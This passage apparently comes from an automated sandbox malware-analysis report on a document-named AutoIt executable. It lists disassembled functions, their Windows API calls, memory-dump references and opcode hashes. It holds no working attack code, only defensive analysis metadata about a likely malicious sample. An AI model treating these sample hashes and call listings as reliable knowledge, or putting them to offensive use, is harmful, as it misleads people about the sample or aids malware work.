                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0075354D,?,007545D5,?,00008000), ref: 00754A1D
                                                        • Sleep.KERNEL32(?,?,?,?,?,?,?,0075354D,?,007545D5,?,00008000), ref: 00754A50
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CounterPerformanceQuerySleep
                                                        • String ID:
                                                        • API String ID: 2875609808-0
                                                        • Opcode ID: 76d027ef8a1b09908459926d4717f2c6a7e54c84a49adc23b78949421a0b6a2f
                                                        • Instruction ID: 2fa6de9eb6b45b487632d926074a5d101ccbd6fb63123dc73f2e4f3348285c3c
                                                        • Opcode Fuzzy Hash: 76d027ef8a1b09908459926d4717f2c6a7e54c84a49adc23b78949421a0b6a2f
                                                        • Instruction Fuzzy Hash: CE113C71D4052CDBCF10EFA5D989AEEBB78FF08716F018056ED41B2240CB789995CB99
                                                        Function 00745BA2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                        • String ID:
                                                        • API String ID: 3016257755-0
                                                        • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                        • Instruction ID: 5328dba804a681ee7d0813136f8fb23ad11e15edb4ac99737edd7803702a6866
                                                        • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                        • Instruction Fuzzy Hash: C6014B7240064EFBCF125E84DC45CEE3F62FB19350B588815FA1859032D33ACAB1AB92
                                                        Function 007380E2 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0073869D: __getptd_noexit.LIBCMT ref: 0073869E
                                                        • __lock.LIBCMT ref: 0073811F
                                                        • InterlockedDecrement.KERNEL32(?), ref: 0073813C
                                                        • _free.LIBCMT ref: 0073814F
                                                        • InterlockedIncrement.KERNEL32(017739F0), ref: 00738167
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                        • String ID:
                                                        • API String ID: 2704283638-0
                                                        • Opcode ID: 48a1f063176da4dd47060baacd40e0a7ff34c0986d566138b7782dadbfc7a90d
                                                        • Instruction ID: 12a2e04f04718182c26f7759da545969b9db3939193c82663c1831ae0d2227c3
                                                        • Opcode Fuzzy Hash: 48a1f063176da4dd47060baacd40e0a7ff34c0986d566138b7782dadbfc7a90d
                                                        • Instruction Fuzzy Hash: 84016D71901729EBEBA5AF74980AB99B360BF04715F04411DF81467293CF3C6942CBD7
                                                        Function 00738724 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • __lock.LIBCMT ref: 00738768
                                                          • Part of subcall function 00738984: __mtinitlocknum.LIBCMT ref: 00738996
                                                          • Part of subcall function 00738984: RtlEnterCriticalSection.NTDLL(00730127), ref: 007389AF
                                                        • InterlockedIncrement.KERNEL32(DC840F00), ref: 00738775
                                                        • __lock.LIBCMT ref: 00738789
                                                        • ___addlocaleref.LIBCMT ref: 007387A7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                        • String ID:
                                                        • API String ID: 1687444384-0
                                                        • Opcode ID: 0a2984297bcd69883696b5d4decb655e82770d0c9a1f2650be634c9535382ccd
                                                        • Instruction ID: 24d9f1a8e48ccf9cff8fc04c60899257b8e51f6cdb4c4ffed84f614de366a93c
                                                        • Opcode Fuzzy Hash: 0a2984297bcd69883696b5d4decb655e82770d0c9a1f2650be634c9535382ccd
                                                        • Instruction Fuzzy Hash: 9F016DB1400B00EFE760EFB5D809759F7F0AF40725F20890EF099972A2CB78A640CB02
                                                        Function 00759C73 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RtlEnterCriticalSection.NTDLL(?), ref: 00759C7F
                                                          • Part of subcall function 0075AD14: _memset.LIBCMT ref: 0075AD49
                                                        • _memmove.LIBCMT ref: 00759CA2
                                                        • _memset.LIBCMT ref: 00759CAF
                                                        • RtlLeaveCriticalSection.NTDLL(?), ref: 00759CBF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                                        • String ID:
                                                        • API String ID: 48991266-0
                                                        • Opcode ID: f4227cbb82420f7f51c94ccbe0307d43b2e3a3328583be32a93988be9d98a58e
                                                        • Instruction ID: 1ab14ac3b8d59fa422e61a935c0023abcb7a211546a5f9cb4acdbf1f6a68f60b
                                                        • Opcode Fuzzy Hash: f4227cbb82420f7f51c94ccbe0307d43b2e3a3328583be32a93988be9d98a58e
                                                        • Instruction Fuzzy Hash: 6EF03076201100ABCB016F54EC89A99BB29EF45311F08C062FE085E217C779E815DBF5
                                                        Function 0077E83C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0072B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0072B5EB
                                                          • Part of subcall function 0072B58B: SelectObject.GDI32(?,00000000), ref: 0072B5FA
                                                          • Part of subcall function 0072B58B: BeginPath.GDI32(?), ref: 0072B611
                                                          • Part of subcall function 0072B58B: SelectObject.GDI32(?,00000000), ref: 0072B63B
                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0077E860
                                                        • LineTo.GDI32(00000000,?,?), ref: 0077E86D
                                                        • EndPath.GDI32(00000000), ref: 0077E87D
                                                        • StrokePath.GDI32(00000000), ref: 0077E88B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                        • String ID:
                                                        • API String ID: 1539411459-0
                                                        • Opcode ID: e12f8dbff93f623b8efb350342c95c285c529ea6bd87a252ff30f074ba7a06ec
                                                        • Instruction ID: c06400ed50fdf15aae20352c7805c1dbfd782977faca6ea4f30b793293313b8b
                                                        • Opcode Fuzzy Hash: e12f8dbff93f623b8efb350342c95c285c529ea6bd87a252ff30f074ba7a06ec
                                                        • Instruction Fuzzy Hash: C6F08931001259B7DB225F54AC0EFCE3F596F09311F04C142FA15250E1877D5952DF99
                                                        Function 0074D623 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0074D640
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0074D653
                                                        • GetCurrentThreadId.KERNEL32 ref: 0074D65A
                                                        • AttachThreadInput.USER32(00000000), ref: 0074D661
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                        • String ID:
                                                        • API String ID: 2710830443-0
                                                        • Opcode ID: b1be8043f5515a72265158bd8b4970e7bd3c5e7bd62dd0e9e478eb69a767ed1a
                                                        • Instruction ID: 3e7e1d52ee89bbc3808590491d5e0b325026eee95323b76f25772f4ccf4fd2c9
                                                        • Opcode Fuzzy Hash: b1be8043f5515a72265158bd8b4970e7bd3c5e7bd62dd0e9e478eb69a767ed1a
                                                        • Instruction Fuzzy Hash: 1FE03932141228BADB301BA29C0DEDB7F2CEF117E1F008012B54C85060CB799D81CBA8
                                                        Function 0072B0AC Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetSysColor.USER32(00000008), ref: 0072B0C5
                                                        • SetTextColor.GDI32(?,000000FF), ref: 0072B0CF
                                                        • SetBkMode.GDI32(?,00000001), ref: 0072B0E4
                                                        • GetStockObject.GDI32(00000005), ref: 0072B0EC
                                                        • GetWindowDC.USER32(?,00000000), ref: 0078ECFA
                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 0078ED07
                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 0078ED20
                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 0078ED39
                                                        • GetPixel.GDI32(00000000,?,?), ref: 0078ED59
                                                        • ReleaseDC.USER32(?,00000000), ref: 0078ED64
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                        • String ID:
                                                        • API String ID: 1946975507-0
                                                        • Opcode ID: 325ce6be7c5cf35923134e529fa9f6855c924762600251b125be3af033c3b27d
                                                        • Instruction ID: 813777a0f915cbe83f34952af148fde2a1c0cb94b93536dc5258bc29773fae83
                                                        • Opcode Fuzzy Hash: 325ce6be7c5cf35923134e529fa9f6855c924762600251b125be3af033c3b27d
                                                        • Instruction Fuzzy Hash: CFE06D32540244AEEB315F74AC4D7983B21AB45335F00C226F769580E2C3794942CB21
                                                        Function 0078C0A0 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                        • String ID:
                                                        • API String ID: 2889604237-0
                                                        • Opcode ID: f463c616dadd911c6362bb752568a5fce56937d14a651be5515060470aca5606
                                                        • Instruction ID: da621cc5ccf7453445b81455fb14cebb934498c8a823e8297e6982b3ef4f3f7e
                                                        • Opcode Fuzzy Hash: f463c616dadd911c6362bb752568a5fce56937d14a651be5515060470aca5606
                                                        • Instruction Fuzzy Hash: C8E04FB1500210EFDB206F71DC4C6693BB5EB4C3A0F11C406FD4A87211DA7C9D828B14
                                                        Function 0078C0B4 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: CapsDesktopDeviceReleaseWindow
                                                        • String ID:
                                                        • API String ID: 2889604237-0
                                                        • Opcode ID: d52ab38afc036f599a12013945db31bb774a85deedf6f9f6e92bc99038aaa78e
                                                        • Instruction ID: 3ea0d5af236cd2dd5de105ac1299ec989978a68f9a329d5f53a55030f700966e
                                                        • Opcode Fuzzy Hash: d52ab38afc036f599a12013945db31bb774a85deedf6f9f6e92bc99038aaa78e
                                                        • Instruction Fuzzy Hash: 46E046B1500210EFDB206F71DC4C6693BB9EB4C3A0F11C406F94A8B211DBBC9D828B04
                                                        Function 00792350 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 475COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: >$DEFINE
                                                        • API String ID: 4104443479-1664449232
                                                        • Opcode ID: b55aa93d5d0b645abb4e8c52d559b2cd93622cd6e7407b4edad53f82babe0875
                                                        • Instruction ID: 75e225f98f4eab24fe255ff2d4a4442706e4744d97256234dd08f49699919388
                                                        • Opcode Fuzzy Hash: b55aa93d5d0b645abb4e8c52d559b2cd93622cd6e7407b4edad53f82babe0875
                                                        • Instruction Fuzzy Hash: 91125E75A00209DFCF24DF58D490AEDB7B1FF48310F25815AE855AB395E738AD82CB90
                                                        Function 0074EAD5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • OleSetContainedObject.OLE32(?,00000001), ref: 0074ECA0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: ContainedObject
                                                        • String ID: AutoIt3GUI$Container
                                                        • API String ID: 3565006973-3941886329
                                                        • Opcode ID: a123ec687044b4404167cf85ef3c730ded3bfcb9911bf273af6a7ae241d28103
                                                        • Instruction ID: 05d9b2c3b414841e0baf86544dfd255fb6894457e8c51be86b989b1bba2fe520
                                                        • Opcode Fuzzy Hash: a123ec687044b4404167cf85ef3c730ded3bfcb9911bf273af6a7ae241d28103
                                                        • Instruction Fuzzy Hash: 3A9108B4600701EFDB14DF64C884B6ABBA5FF49720F24856DE94ADB291DB78E841CB60
                                                        Function 0075E704 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 00713BCF: _wcscpy.LIBCMT ref: 00713BF2
                                                          • Part of subcall function 007184A6: __swprintf.LIBCMT ref: 007184E5
                                                          • Part of subcall function 007184A6: __itow.LIBCMT ref: 00718519
                                                        • __wcsnicmp.LIBCMT ref: 0075E785
                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0075E84E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                        • String ID: LPT
                                                        • API String ID: 3222508074-1350329615
                                                        • Opcode ID: e176212a5352c9ec20845962fa292ff096577a89a7143a1f1a2aa6eca85d9e72
                                                        • Instruction ID: 6ea4b48fd8975e8e1e899593041e57e2557eb25a55be089eda93dc1927631a6f
                                                        • Opcode Fuzzy Hash: e176212a5352c9ec20845962fa292ff096577a89a7143a1f1a2aa6eca85d9e72
                                                        • Instruction Fuzzy Hash: 92619375A00215EFCB18DF98C895EEEB7B4EF48310F004069F946AB291DB78AF84CB50
                                                        Function 00711B72 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • Sleep.KERNEL32(00000000), ref: 00711B83
                                                        • GlobalMemoryStatusEx.KERNEL32 ref: 00711B9C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692122181.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_710000_DOC092024-0431202229487.jbxd
                                                        Similarity
                                                        • API ID: GlobalMemorySleepStatus
                                                        • String ID: @
                                                        • API String ID: 2783356886-2766056989
                                                        • Opcode ID: 492b419f31bda69f6fa3519536d99dfa53f5cd56e6d51aac29d65cdbdd8fa034
                                                        • Instruction ID: 5d18520afdf81053a507f194b52c621f191fb9d9908c76a649725b6544fa24c9
                                                        • Opcode Fuzzy Hash: 492b419f31bda69f6fa3519536d99dfa53f5cd56e6d51aac29d65cdbdd8fa034
                                                        • Instruction Fuzzy Hash: 81514B71408744EBE320AF14E889BABBBECFF94354F41884DF1C8410A6EB75996DC766
                                                        Function 0075CE59 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0071417D: __fread_nolock.LIBCMT ref: 0071419B
                                                        • _wcscmp.LIBCMT ref: 0075CF49
                                                        • _wcscmp.LIBCMT ref: 0075CF5C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1691980696.0000000000711000.00000040.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true
                                                        • Associated: 00000000.00000002.1691812162.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.00000000007DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1691980696.0000000000845000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1692107264.000000000084B000.00000080.00000001.01000000.00000003.sdmpDownload File
